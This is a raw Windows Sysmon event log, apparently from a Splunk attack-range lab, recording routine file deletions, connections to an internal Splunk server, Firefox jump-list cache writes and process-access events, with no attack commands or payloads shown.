23542300x80000000000000001045673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:55.252{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ED315C1E58DB87C25F4DC53CB1A4C54,SHA256=C876E3871BCCDFF633FB2619F2C9DDF82025B7D89015DFCB4E98152954A77977,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805846Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:55.138{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FE73D609A1CB3E8F6B92337004447E5,SHA256=2308F6152AB30FCB7142BEB5C6330AC132908D9D8102FA155FAB858C69077CCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:56.704{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:56.267{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83C989DBA22E4F9927F5EFAF1CDAF4F8,SHA256=DD432B020A37F434651FD888C6E2E63A49AA938714990C1CF81B42CDC406C06F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805847Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:56.154{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FED9A27CF889A4BDA7466230D508D047,SHA256=7ADA333081FF8846614A9BC3957DC9125FA12A8D33E366C3F605BE18B98842A3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805849Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:56.224{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57138-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805848Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:57.247{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0D3F6D67D30CD5B17FA7A653ED07F91,SHA256=F44BEA99DF64B510745F4837FA837D5382BF431D9A044D70FC70FA18A9915842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:57.287{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7743A6025505FAA614818069D0EC446B,SHA256=F96BC1DB7716C77F50525729ACAB726541C97AB5618E12774562866D15C9F1E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805850Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:58.279{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=030CEA7010617F15AB156A18D351E397,SHA256=3F58B1506095E3AAF9008039278F02ECDA5D9C14C155968D9FBACBF898B105A3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.640{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50886-false10.0.1.12-8000- 354300x80000000000000001045680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.240{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50885-false10.0.1.12-8089- 23542300x80000000000000001045679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:58.303{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=130F05EF3C23C73796334C5C64004EE6,SHA256=84D5CFABD17DCCE79B7D0D5F067681A9FF5F197655634E35A2AA500C70A97422,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001045678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:58.050{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf60c9a0.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:59.334{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B414A8725C811E94D6C0EF72108DB945,SHA256=B24F7983BC1A6A856943F26018691BC3AE70191D9BB4D1E2B8C324FAE843DCFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805851Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:59.310{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E5851E3E73BAB7ABD2F495656E27129,SHA256=2D8CF257FF55ECAF6D25E17C2E65586D30AE65F8CE671CBD86EC22D07D54995C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.634{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001045707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.634{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001045706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.634{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001045705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.634{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001045704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.634{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf60d3b2.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.619{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\Zcu+SuGceoMw7jEKUb5oDw==.icoMD5=88B48CE20644063F896B4773C1AC1D91,SHA256=4910F163A5CD41C4B118E08ED3499191EFBE57CB26DF84BF39E71E71254404FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.619{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\xo8k2ky3GpHiI1pLvhaG2w==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.619{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\VBMHe4znoVL+YG5UjBj2Fg==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.619{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\v5zZN0gWxQQcSlsFXkjFSw==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.619{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\uH_MCOVJ9Aduvu6vCVSCpQ==.icoMD5=88B48CE20644063F896B4773C1AC1D91,SHA256=4910F163A5CD41C4B118E08ED3499191EFBE57CB26DF84BF39E71E71254404FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\u7tfzr9UnZgBN9ofDX_SlQ==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\ThM2efvLQFClAZ6o2apafw==.icoMD5=5D981C37A2B6D1A11D7FEB87FE58D74B,SHA256=B87A03C2E30B1160D0C50F9E6DD18AF4298B21957368D8020D0A70319D4E78AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\tdLM+KOjWsfBYA7G0BW+zw==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\SNLa1UNHrsKGK3H8U+id+w==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\sCeT886FgjTtZBVrjDjxlQ==.icoMD5=EE7F785510FFD6C4182979149AAB3F3E,SHA256=CDF8CABCD401B895306E04017C2AFDDC2D4D5FE48810BD5E4CC652B668CC5B65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\Q2sS3vx2J886sbGqfF7B2A==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\pV+3TL7Nu3EP5juvr_gPjg==.icoMD5=3179477007C6C6EF4023DFBC1FAD412E,SHA256=D1AF848123880D324A8B3D0404F40E19B195380364EFBFACF3126886234A8377,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\OFVEIqzdBKeKpdOgW1or1g==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\ng2FLPaKpq7YK1yIWMPFRg==.icoMD5=5D981C37A2B6D1A11D7FEB87FE58D74B,SHA256=B87A03C2E30B1160D0C50F9E6DD18AF4298B21957368D8020D0A70319D4E78AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\MKk4smTa9mGSU6uvnGJXjw==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\LlB9BoUNa4ZtudtaDQs1yA==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\IP0wnRTpLv_qsq4nlNF5zw==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.603{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\GCPFYDP8YS_iRU8ht6aUMA==.icoMD5=1A25BD5A01EC04884A81344CEFFDA24C,SHA256=49633BA947E721A8EF218137A24A9874C6B49F4E374C5F304975DAE1B5EFF166,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.587{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\cpEbUHld0HIDZebvGsX43A==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.587{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\jumpListCache\11J3zf_vmVpGrlm9rvHbhg==.icoMD5=34B38C56ABB441042B35858DB242FEBC,SHA256=AF0494CA2AA5260E30542C4076039929C07E0B3552F3499D0FF7F0B0C5C331DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:00.349{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DCD74D609E26B730E197CE83191BDC0,SHA256=EF2DD642D9B103B9D0CC9282BC72E45D55B27193D4A1F9DBAB1BB7921BE80164,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805852Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:00.326{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C979A4BB845711763459C79955D7EF4,SHA256=05845186161895CB454BCBB2D973A47ACF2D57E54029E95DD24A048A65BC2C65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:01.350{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A13215F81CC157B2A4D8133CBD83D0FA,SHA256=FFDDA4E7D1EAED3BE6A8667ED0C6F544B749FC7E17EA91C57B03AF3E1E6462B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805853Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:01.326{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=020C79EC95600E9E2035EC3C119DFD81,SHA256=18762B5EA51B02E6147D1A76808A853EED61F7C1C7FBC8735E5F8F91DA5E3397,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
